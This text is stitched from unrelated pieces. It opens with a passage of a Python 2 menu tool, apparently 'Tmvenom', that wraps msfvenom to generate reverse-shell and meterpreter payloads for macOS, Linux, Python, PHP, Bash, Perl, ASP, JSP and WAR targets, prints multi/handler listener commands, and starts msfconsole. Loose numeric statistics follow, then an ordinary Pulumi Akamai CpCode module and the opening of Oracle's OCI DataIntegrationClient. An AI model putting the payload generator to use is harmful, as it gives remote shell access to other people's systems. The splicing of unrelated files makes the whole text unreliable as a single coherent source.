print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/mac.macho'
pt()
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p osx/x86/shell_reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f macho > ' + pay)
pt()
print Fore.YELLOW + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
pt()
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload osx/x86/shell_reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def linux():
print ''
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/linux.elf'
print ''
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print Fore.GREEN + 'Generating payload.....'
pt()
os.system('msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f elf > ' + pay)
pt()
print green + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
pt()
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload linux/x86/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def python():
print ''
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
pt()
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/back.py'
print ''
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p python/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -o ' + pay)
pt()
print yellow + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
print ''
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print Back.BLUE + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload python/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLOCAL IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
print ''
print cyan + '---------------------------------------------------------'
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def php():
print ''
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
pt()
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/payload.php'
print ''
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p php/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -o ' + pay)
pt()
print Fore.YELLOW + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
pt()
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print Back.BLUE + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload php/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLOCAL IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def bash():
print ''
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
pt()
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/shell.sh'
print ''
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p cmd/unix/reverse_bash LHOST=' + ip + ' LPORT=' + por + ' -f raw > ' + pay)
pt()
print Fore.YELLOW + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
pt()
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print Back.BLUE + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload cmd/unix/reverse_bash'
print ' set lhost {} =(\x1b[91mLOCAL IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def perl():
pt()
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
pt()
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/shell.pl'
print ''
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p cmd/unix/reverse_perl LHOST=' + ip + ' LPORT=' + por + ' -f raw > ' + pay)
pt()
print Fore.YELLOW + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
pt()
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print Back.BLUE + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload cmd/unix/reverse_perl'
print ' set lhost {} =(\x1b[91mLOCAL IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def asp():
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/shell.asp'
pt()
pay = raw_input(green + '[->] path and Name = ')
pt()
print cyan + 'Generating payload.....'
pt()
os.system('msfvenom -p windows/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f asp > ' + pay)
pt()
print green + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
pt()
print Fore.CYAN + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload windows/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def jsp():
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/shell.jsp'
pt()
pay = raw_input(green + '[->] path and Name = ')
pt()
print cyan + 'Generating payload.....'
pt()
os.system('msfvenom -p java/jsp_shell_reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f raw > ' + pay)
pt()
print green + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
pt()
print Fore.CYAN + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload java/jsp_shell_reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def war():
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/shell.war'
pt()
pay = raw_input(green + '[->] path and Name = ')
pt()
print cyan + 'Generating payload.....'
pt()
os.system('msfvenom -p java/jsp_shell_reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f war > ' + pay)
pt()
print green + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
pt()
print Fore.CYAN + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload java/jsp_shell_reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
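# menu() clears the screen, redraws the banner and option list, then
# dispatches to the generator matching the user's choice; 'l' lists every
# msfvenom payload and 'h' prints the msfvenom/msfconsole help pages.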
def menu():
os.system('clear')
print '\x1b[1;92m'
logo()
pt()
print red + ' <<---------------[ PAYLOAD MENU ]---------------->> v 2.0'
pt()
print red + ' [a] ==>' + green + ' Author info ' + red + ' [h] ==>' + green + ' help '
pt()
print red + ' [1] ==>' + green + ' Android payload ' + red + ' [l] ==>' + green + ' all payload list '
pt()
print red + ' [2] ==>' + green + ' Python Payload '
pt()
print red + ' [3] ==>' + green + ' Php Payload '
pt()
print red + ' [4] ==>' + green + ' Windows Payload '
pt()
print red + ' [5] ==>' + green + ' Linux Payload '
pt()
print red + ' [6] ==>' + green + ' Mac Payload '
pt()
print red + ' [7] ==>' + green + ' Perl Payload '
pt()
print red + ' [8] ==>' + green + ' Bash Payload '
pt()
print red + ' [9] ==>' + green + ' Asp Payload '
pt()
print red + ' [10] ==>' + green + ' Jsp Payload '
pt()
print red + ' [11] ==>' + green + ' War Payload '
pt()
print red + '--------------------------------------------'
pt()
op = raw_input('\x1b[1;96mSelect@[\x1b[1;91m Tmvenom \x1b[1;96m]#:\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x9d\xaf \x1b[1;92m')
if op == '1':
os.system('clear')
pt()
android()
elif op == '2':
os.system('clear')
pt()
python()
elif op == '3':
os.system('clear')
pt()
php()
elif op == '4':
os.system('clear')
pt()
windows()
elif op == '5':
os.system('clear')
pt()
linux()
elif op == '6':
os.system('clear')
pt()
mac()
elif op == '7':
os.system('clear')
pt()
perl()
elif op == '8':
os.system('clear')
pt()
bash()
elif op == '9':
os.system('clear')
pt()
asp()
elif op == '10':
os.system('clear')
pt()
jsp()
elif op == '11':
os.system('clear')
pt()
war()
elif op == 'l':
pt()
os.system('msfvenom -l')
pt()
again()
elif op == 'h':
pt()
print cyan + ' <<< msfvenom help >>>'
print green
os.system('msfvenom -h')
pt()
print cyan + ' <<< msfconsole help >>>'
print green
os.system('msfconsole -h')
pt()
again()
elif op == 'a':
auth()
elif op == 'e':
print '\x1b[1;92m Exiting......'
else:
again()
menu()
| 39.43876
| 739
| 0.51313
| 3,336
| 25,438
| 3.889089
| 0.063549
| 0.081394
| 0.12209
| 0.162787
| 0.837984
| 0.829197
| 0.823031
| 0.817712
| 0.806228
| 0.805611
| 0
| 0.106389
| 0.268378
| 25,438
| 644
| 740
| 39.5
| 0.590726
| 0.008766
| 0
| 0.775
| 0
| 0.013333
| 0.532572
| 0.238872
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.008333
| null | null | 0.44
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
90fab3fbac55051a798d96fb0bd78f8b9894727c
| 14,958
|
py
|
Python
|
sdk/python/pulumi_akamai/properties/cp_code.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2021-01-21T15:22:12.000Z
|
2021-08-25T14:15:29.000Z
|
sdk/python/pulumi_akamai/properties/cp_code.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | 59
|
2020-08-13T14:39:36.000Z
|
2022-03-31T15:19:48.000Z
|
sdk/python/pulumi_akamai/properties/cp_code.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['CpCodeArgs', 'CpCode']
@pulumi.input_type
class CpCodeArgs:
def __init__(__self__, *,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a CpCode resource.
"""
if contract is not None:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
if contract is not None:
pulumi.set(__self__, "contract", contract)
if contract_id is not None:
pulumi.set(__self__, "contract_id", contract_id)
if group is not None:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
if group is not None:
pulumi.set(__self__, "group", group)
if group_id is not None:
pulumi.set(__self__, "group_id", group_id)
if name is not None:
pulumi.set(__self__, "name", name)
if product is not None:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
if product is not None:
pulumi.set(__self__, "product", product)
if product_id is not None:
pulumi.set(__self__, "product_id", product_id)
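# Note the warn-then-set pattern above: each deprecated plain setting still
# takes effect after emitting a DeprecationWarning, so existing programs keep
# working while users migrate to the *_id fields.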
@property
@pulumi.getter
def contract(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract")
@contract.setter
def contract(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract", value)
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract_id")
@contract_id.setter
def contract_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract_id", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="groupId")
def group_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group_id")
@group_id.setter
def group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def product(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product")
@product.setter
def product(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product_id", value)
@pulumi.input_type
class _CpCodeState:
def __init__(__self__, *,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering CpCode resources.
"""
if contract is not None:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
if contract is not None:
pulumi.set(__self__, "contract", contract)
if contract_id is not None:
pulumi.set(__self__, "contract_id", contract_id)
if group is not None:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
if group is not None:
pulumi.set(__self__, "group", group)
if group_id is not None:
pulumi.set(__self__, "group_id", group_id)
if name is not None:
pulumi.set(__self__, "name", name)
if product is not None:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
if product is not None:
pulumi.set(__self__, "product", product)
if product_id is not None:
pulumi.set(__self__, "product_id", product_id)
@property
@pulumi.getter
def contract(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract")
@contract.setter
def contract(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract", value)
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract_id")
@contract_id.setter
def contract_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract_id", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="groupId")
def group_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group_id")
@group_id.setter
def group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def product(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product")
@product.setter
def product(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product_id", value)
warnings.warn("""akamai.properties.CpCode has been deprecated in favor of akamai.CpCode""", DeprecationWarning)
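# Hedged usage sketch (the resource name and property values below are
# illustrative placeholders, not taken from this file):
#
#   import pulumi_akamai as akamai
#   cp = akamai.properties.CpCode("example",
#       contract_id="ctr_1-XXXXXX",
#       group_id="grp_XXXXX",
#       product_id="prd_XXXXX",
#       name="example-cpcode")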
class CpCode(pulumi.CustomResource):
warnings.warn("""akamai.properties.CpCode has been deprecated in favor of akamai.CpCode""", DeprecationWarning)
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a CpCode resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[CpCodeArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a CpCode resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param CpCodeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CpCodeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
__props__=None):
pulumi.log.warn("""CpCode is deprecated: akamai.properties.CpCode has been deprecated in favor of akamai.CpCode""")
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CpCodeArgs.__new__(CpCodeArgs)
if contract is not None and not opts.urn:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
__props__.__dict__["contract"] = contract
__props__.__dict__["contract_id"] = contract_id
if group is not None and not opts.urn:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
__props__.__dict__["group"] = group
__props__.__dict__["group_id"] = group_id
__props__.__dict__["name"] = name
if product is not None and not opts.urn:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
__props__.__dict__["product"] = product
__props__.__dict__["product_id"] = product_id
super(CpCode, __self__).__init__(
'akamai:properties/cpCode:CpCode',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None) -> 'CpCode':
"""
Get an existing CpCode resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CpCodeState.__new__(_CpCodeState)
__props__.__dict__["contract"] = contract
__props__.__dict__["contract_id"] = contract_id
__props__.__dict__["group"] = group
__props__.__dict__["group_id"] = group_id
__props__.__dict__["name"] = name
__props__.__dict__["product"] = product
__props__.__dict__["product_id"] = product_id
return CpCode(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def contract(self) -> pulumi.Output[str]:
return pulumi.get(self, "contract")
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "contract_id")
@property
@pulumi.getter
def group(self) -> pulumi.Output[str]:
return pulumi.get(self, "group")
@property
@pulumi.getter(name="groupId")
def group_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "group_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter
def product(self) -> pulumi.Output[str]:
return pulumi.get(self, "product")
@property
@pulumi.getter(name="productId")
def product_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "product_id")
| 40.427027
| 134
| 0.621139
| 1,734
| 14,958
| 5.130911
| 0.078431
| 0.082837
| 0.102282
| 0.155783
| 0.828931
| 0.815219
| 0.801731
| 0.791166
| 0.77026
| 0.724401
| 0
| 0.00009
| 0.257722
| 14,958
| 369
| 135
| 40.536585
| 0.801225
| 0.073339
| 0
| 0.824138
| 1
| 0
| 0.145355
| 0.007535
| 0
| 0
| 0
| 0
| 0
| 1
| 0.144828
| false
| 0.003448
| 0.017241
| 0.072414
| 0.248276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2917afe98cc0b2f4b0173004907a2390ab15003f
| 541,292
|
py
|
Python
|
src/oci/data_integration/data_integration_client.py
|
Manny27nyc/oci-python-sdk
|
de60b04e07a99826254f7255e992f41772902df7
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/data_integration/data_integration_client.py
|
Manny27nyc/oci-python-sdk
|
de60b04e07a99826254f7255e992f41772902df7
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/data_integration/data_integration_client.py
|
Manny27nyc/oci-python-sdk
|
de60b04e07a99826254f7255e992f41772902df7
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from oci._vendor import requests # noqa: F401
from oci._vendor import six
from oci import retry # noqa: F401
from oci.base_client import BaseClient
from oci.config import get_config_value_or_default, validate_config
from oci.signer import Signer
from oci.util import Sentinel, get_signer_from_authentication_type, AUTHENTICATION_TYPE_FIELD_NAME
from .models import data_integration_type_mapping
missing = Sentinel("Missing")
class DataIntegrationClient(object):
"""
Use the Data Integration Service APIs to perform common extract, load, and transform (ETL) tasks.
"""
def __init__(self, config, **kwargs):
"""
Creates a new service client
:param dict config:
Configuration keys and values as per `SDK and Tool Configuration <https://docs.cloud.oracle.com/Content/API/Concepts/sdkconfig.htm>`__.
The :py:meth:`~oci.config.from_file` method can be used to load configuration from a file. Alternatively, a ``dict`` can be passed. You can validate
the dict using :py:meth:`~oci.config.validate_config`.
:param str service_endpoint: (optional)
The endpoint of the service to call using this client. For example ``https://iaas.us-ashburn-1.oraclecloud.com``. If this keyword argument is
not provided then it will be derived using the region in the config parameter. You should only provide this keyword argument if you have an explicit
need to specify a service endpoint.
:param timeout: (optional)
The connection and read timeouts for the client. The default values are connection timeout 10 seconds and read timeout 60 seconds. This keyword argument can be provided
as a single float, in which case the value provided is used for both the read and connection timeouts, or as a tuple of two floats. If
a tuple is provided then the first value is used as the connection timeout and the second value as the read timeout.
:type timeout: float or tuple(float, float)
:param signer: (optional)
The signer to use when signing requests made by the service client. The default is to use a :py:class:`~oci.signer.Signer` based on the values
provided in the config parameter.
One use case for this parameter is for `Instance Principals authentication <https://docs.cloud.oracle.com/Content/Identity/Tasks/callingservicesfrominstances.htm>`__
by passing an instance of :py:class:`~oci.auth.signers.InstancePrincipalsSecurityTokenSigner` as the value for this keyword argument
:type signer: :py:class:`~oci.signer.AbstractBaseSigner`
:param obj retry_strategy: (optional)
A retry strategy to apply to all calls made by this service client (i.e. at the client level). There is no retry strategy applied by default.
